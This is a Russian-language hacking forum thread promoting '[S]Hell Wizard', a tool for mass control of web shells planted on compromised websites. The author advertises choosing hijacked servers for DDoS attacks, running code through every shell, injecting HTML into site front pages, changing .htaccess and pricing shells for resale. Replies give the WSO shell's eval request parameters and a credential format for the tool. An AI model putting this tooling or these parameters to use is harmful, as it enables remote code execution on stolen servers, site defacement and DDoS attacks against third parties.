[S]Hell Wizard - управляем веб-шеллами вместе c Dr.Z3r0 :)

Dr.Z3r0 · 06.07.2010, 15:46

Вообщем представляю вашему вниманию свою тулзу для управления шеллами:

[S]Hell Wizard
Текущая версия: 5.0 (28.12.2011)

Введение
Даная система предназначенна для массового управления веб шеллами нескольких типов. Как в плюс пытался создать максимально интуитивно понятный интерфейс, но и в тоже время оставить большой функционал в этой тулзе.

Основной принцип на котором основанна эта система - хранение информации о каждом из шеллов, о сервере на котором он расположен, о домене в БД - так упрощается выборка шеллов под ваши нужды.

К примеру, есть у вас огромный список из тысячи веб шеллов, и вам требуются шеллы под организацию ДДОС атаки - можно без проблем сделать выборку по параметрам PHP установленного на сервере, таким как есть ли возможность управлять set_time_limit-ом, можно ли установить ignore_user_abort=true, включены ли сокеты и отсортировать вывод по ширине канала сервера, ну чем не сказка?)

Основные достоинства
- Гибкая настройка выборки шеллов, и имхо достаточно интуитивно понятная
- Интересующая вас информация о сервере для каждого веб шелла
- Чек на PR каждого домена
- Настройки вывода как в браузер так и в файл
- Выполнение кода для каждого из веб шеллов
- reverse-ip для домена на котором расположен шелл в один клик
- Фишка с возможностью продолжения работы скрипта
- Возможно добавление хтмл кода в морду сайта
- Возможна организация ддос атак
- работа с бд прям из тулзы (скуль запросы и бекап БД)
- Ну и есть небольшой мануал, правдо недописанный до конца - так как меня вдруг охватил приступ лени.

Добавленно
С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!

Шеллы с паролем добавлять в следующем формате:

Цитата:

если только пароль:
http://host1/path/wso.php|root
если пара логин/пароль:
http://host2/path/r57.php|admin|pass

Недостатки
Собственно это те недостатки которые я в ближайщем будущем планирую исправить:
- Как кое кто сказал - ужасный дизайн (ну не дизайнер я, хоть убей).

Где взять
По ссылке последняя версия: ShellWizard 5.0

Заключение
Тулза раз двадцать переписанная, могут быть баги, о багах пишите здесь.
Блаблабла, юзайте наздоровье)

В аттаче старая версия 4.3, ссылку на новую ищи выше

esh · 06.07.2010, 20:37

Релиз просто ШЕДЕВР! НЕТ СЛОВ!
Сам хотел написать, но я для этого слишком туп.

Единственный серьезный косяк, это неумение тулзы работать с нормальной POST\Session авторизацией, да да, как раз в той, что сделана для wSo, я между прочем был удивлен, почему в списке wSo так и не оказалось, а помоему самый ходовой шелл, не?

И ещё вот что. не нашел где там можно сделать DDoS, мб плохо искал? Ткните носом плз..........

esh · 06.07.2010, 21:32

Цитата:

Сообщение от BlackSun

WSO нет скорее всего по той причине, что эта утилита писалась еще до того, как вышла хотя бы первая версия этого шелла.

WS0 нет, но способ авторизации всегда был, не?
Очень надеюсь, что автор его все-таки добавит в ближайшие намедни.

И все-же ответьте на мой поставленный вопрос по поводу DDoS`a!

GrandMaster · 09.07.2010, 13:11

да, добавить бы туда wso и цены ей не будет

Nightmare · 10.07.2010, 19:39

Цитата:

Сообщение от GrandMaster

да, добавить бы туда wso и цены ей не будет

Так его и добавлять то нечего, заходим в меню "Добавить шелл" и там:
1) ID: wso
2) Имя: WSO Shell
3) Регулярка: #WSO#i
4) eval GET: [none]
5) eval POST: a=Php&p1=[evalcode]

Все работает проще некуда, а вот косяк с запароленными шеллами действительно досадный.

curlbaby · 11.12.2011, 17:41

для WSO с паролем достаточно передать его по POST, как пример:

Цитата:

Сообщение от Nightmare

5) eval POST: a=Php&p1=[evalcode]

5) eval POST: pass=password&a=Php&p1=[evalcode]

vasya · 28.10.2010, 13:29

как такую ошибку исправить

Цитата:

(00:53:46) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 Z:\home\localhost\www\shell_wizard\includes\func.s hell.php (line 61)

при чеке шеллов выдаёт

Dr.Z3r0 · 29.10.2010, 15:17

кривая регулярка в списке типов шеллов, подправь ее

euro · 04.11.2010, 15:21

чек запароленых wso не планируется ?

paranoidchaos · 04.11.2010, 15:27

Цитата:

а вот косяк с запароленными шеллами действительно досадный.

а чё за косяк ?? как ваще чекаете ? бейсик авторизация простая

29.10.2010, 15:17	#8
Dr.Z3r0 Регистрация: 05.07.2010 Сообщений: 101 Репутация: 156	кривая регулярка в списке типов шеллов, подправь ее __________________ На просьбы о помощи в sql-injection в ПМ не отвечаю. Для этих вопросов есть специальные темы.

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

06.07.2010, 20:37	#2
esh Регистрация: 06.07.2010 Сообщений: 2 Репутация: 0	Релиз просто ШЕДЕВР! НЕТ СЛОВ! Сам хотел написать, но я для этого слишком туп. Единственный серьезный косяк, это неумение тулзы работать с нормальной POST\Session авторизацией, да да, как раз в той, что сделана для wSo, я между прочем был удивлен, почему в списке wSo так и не оказалось, а помоему самый ходовой шелл, не? И ещё вот что. не нашел где там можно сделать DDoS, мб плохо искал? Ткните носом плз..........

09.07.2010, 13:11	#4
GrandMaster Регистрация: 09.07.2010 Сообщений: 16 Репутация: 0	да, добавить бы туда wso и цены ей не будет

04.11.2010, 15:21	#9
euro Регистрация: 09.07.2010 Сообщений: 66 Репутация: 8	чек запароленых wso не планируется ?